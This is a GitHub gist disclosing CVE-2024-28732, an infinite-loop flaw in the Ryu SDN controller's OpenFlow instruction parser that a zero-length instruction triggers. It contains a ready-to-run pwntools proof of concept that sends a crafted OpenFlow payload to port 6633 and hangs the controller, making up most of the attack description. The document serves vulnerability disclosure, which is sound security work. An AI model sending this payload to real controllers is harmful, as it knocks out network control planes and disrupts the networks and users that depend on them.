Skip to content

Instantly share code, notes, and snippets.

@ErodedElk

ErodedElk/ReadMe.md

Last active March 30, 2024 05:46
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ErodedElk/1133d64dde2d92393a065edc9b243792 to your computer and use it in GitHub Desktop.
Save ErodedElk/1133d64dde2d92393a065edc9b243792 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2024-28732-Ref
Raw
ReadMe.md

CVE-2024-28732

in /ryu/ofproto/ofproto_v1_3_parser.py about line=1050

class OFPFlowMod(MsgBase):
....
        while offset < msg_len:
            i = OFPInstruction.parser(buf, offset)
            instructions.append(i)
            offset += i.len
        msg.instructions = instructions

If OFPInstruction.len=0 , the offset will no longer change and the parsing will fall into an infinite loop.

recurrent

Execute the controller through the following command:

ryu-manager

poc:

from pwn import *
p=remote("0.0.0.0",6633)
payload=b"\x04\x0e\x00\x50\xd8\xbc\xde\xb7\x67\xf9\x0c\x3f\xfb\xa6\xdb\x87\x6f\x63\x34\xd0\xe1\x26\x43\x78\x5e\x01\x34\x0d\x32\xb4\xb3\xff\x8f\x99\xc0\xe9\x9e\x84\x70\x62\xc7\x4a\xbf\x01\xf3\xf0\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\xff\xff\xff\xfd\xff\xff\x00\x00\x00\x00\x00\x00"
p.send(payload)
p.interactive()

Executing the POC will cause the controller to fall into an infinite loop and no longer work.

This problem also occurs with the following code:

/ryu/ofproto/ofproto_v1_3_parser.py about line=1050

/ryu/ofproto/ofproto_v1_4_parser.py about line=4453

/ryu/ofproto/ofproto_v1_3_parser.py about line=5321

They will affect OpenFlow1.3, OpenFlow1.4, OpenFlow1.5.

version

Affected versions: v4.34

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment